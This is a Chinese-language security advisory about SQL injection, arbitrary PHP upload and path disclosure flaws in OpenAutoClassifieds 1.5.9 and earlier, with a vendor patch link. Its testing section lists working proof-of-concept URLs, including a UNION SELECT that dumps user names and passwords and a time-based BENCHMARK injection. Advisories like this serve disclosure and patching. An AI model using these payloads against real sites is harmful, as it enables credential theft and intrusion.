发布日期：2009-08-25
更新日期：2009-08-31

受影响系统：

Open Auto Classifieds OpenAutoClassifieds <= 1.5.9

不受影响系统：

Open Auto Classifieds OpenAutoClassifieds 1.6.0

描述：

---

BUGTRAQ  ID: 36173,36174,36175

OpenAutoClassifieds是一款汽车分类管理软件。

OpenAutoClassifieds的多个模块没有正确地验证用户所提交的请求参数，可能导致SQL注入或跨站脚本攻击。

1) OpenAutoClassifieds没有正确地验证对xml_zone_data.php所传送的filter参数和对listings.php所传送的start_zip参数便在SQL查询中使用，这允许远程攻击者通过提交恶意请求执行SQL注入攻击。

2) OpenAutoClassifieds的checkAllowedExt()函数没有正确地检查上传配置文件图形的扩展名，拥有有效用户账号的攻击者可以上传并执行任意PHP代码。

3) 通过向paycalc.php和admin.tpl提交恶意的参数请求，就可以在返回的出错消息中查看文件的完整路径。

<*来源：Andrew Horton
  
  链接：http://secunia.com/advisories/36455/
        http://marc.info/?l=bugtraq&m=125131142405431&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://www.example.com/openauto/xml_zone_data.php?filter=1%20union%20select%20concat(0x0a,user,0x3a,pass,0x3a,0x0a)%20from%20users

http://www.example.com/openauto/listings.php?min-price=&amp;max_price=&amp;start_zip=BENCHMARK(1000000,MD5(1))&amp;zip_range=10000&amp;state=Illinois&amp;submit=Search&amp;vehicle_type=&amp;make=&amp;model=&amp;year=&amp;listing_condition=&amp;trans=&amp;drive_train=&amp;sellerid=

http://www.example.com/openauto/admin/templates/templates_c/%25%25%36%32%5e%36%32%30%5e%36%32%30%36%44%39%39%37%25%25%61%64%6d%69%6e%2e%74%70%6c%2e%70%68%70

建议：

---

厂商补丁：

Open Auto Classifieds
---------------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://sourceforge.net/projects/openauto/files/openauto/openauto_v1.6.0/openauto_full_v1.6.0.zip/download

浏览次数：2256
严重程度：0（网友投票）